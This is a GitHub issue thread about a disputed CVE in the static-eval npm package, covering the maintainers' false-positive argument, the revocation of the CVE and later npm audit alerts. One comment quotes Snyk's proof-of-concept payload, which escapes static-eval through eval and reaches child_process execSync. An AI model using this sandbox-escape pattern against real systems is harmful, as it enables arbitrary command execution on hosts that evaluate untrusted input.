-
Notifications
You must be signed in to change notification settings - Fork 27
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
High Severity Security vulnerability with package #34
Comments
@goto-bus-stop can it be fixed? Thanks! |
It's a false positive. |
Could you elaborate on that a bit? Snyk have a PoC at https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765 ... var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src="(function (x) { return `${eval(\"console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())\")}` })()"
var ast = parse(src).body[0].expression;
evaluate(ast) ... and https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23334 has been raised for it |
I see, I thought it was the same as this: 418sec/huntr#1883. That PR had omitted the quotes. It looks like the snyk one is more valid, but still, essentially expected behaviour as documented in our readme. https://github.com/browserify/static-eval#security |
This issue is also in NVD-CVE-2021-23334. Any workaround that we can use or possibly for a solution? |
i emailed snyk and they said they would revoke the CVE. i'm not sure how that works, so it might take a few days. |
Any more info about the CVE revoke? |
Is already revoked. WhiteSource at least doesn't show it as CVE anymore. |
@SymbioticKilla But I guess it was not officially asked for REJECT to the assigning CNA? According to https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23334 the assigning CNA was "Snyk", so if the issue turns out to be a non-security issue and the CVE invalid the respective CNA would need to reject the entry. |
Do we have any update? |
https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1071860 Snyk has updated their own system reflecting that this was deemed not an issue. However, it has yet to get up to the CVE database to get revoked/amended. I just tweeted at Snyk to see how long that process normally takes. I doubt I'll hear anything, but... Best way to seem to get in touch with something like this. |
Hey @Garbee, thanks for raising this issue, yep i agree, anything going into |
Doesn't look like the CVE database maintainers poll updates to existing issues that are revoked unfortunately :( I sent a report last month for the CVE database and didn't hear back. maybe someone else will be luckier. |
Hey, after contacting MITRE through multiple channels, CVE-2021-23334 has been marked as rejected/revoked. Hope this helps. This issue can be closed |
npm audit from today =( Critical Withdrawn: Arbitrary Code Execution in static-eval Package static-eval Patched in No patch available Dependency of @amcharts/amcharts4 Path @amcharts/amcharts4 > pdfmake > svg-to-pdfkit > pdfkit > |
Same problem here =( |
For those commenting about failing npm/yarn audits suddenly today, I suspect this has to do with the background change to the npm advisories database which now points to the github advisories db: https://github.blog/2021-10-07-github-advisory-database-now-powers-npm-audit/ Not sure what to do with this info yet but an fyi @leonardomaier @SymbioticKilla |
Same issue here also. Any update? |
this package is very stable and the only maintenance effort is in dealing with bogus security warnings. idk why npm doesn't just allow you to silence warnings that are clearly bullshit instead of forcing us to do useless work. i guess i'll email them about this one… |
for folks who use
|
Issue picked up and reported in Snyk: https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765
The text was updated successfully, but these errors were encountered: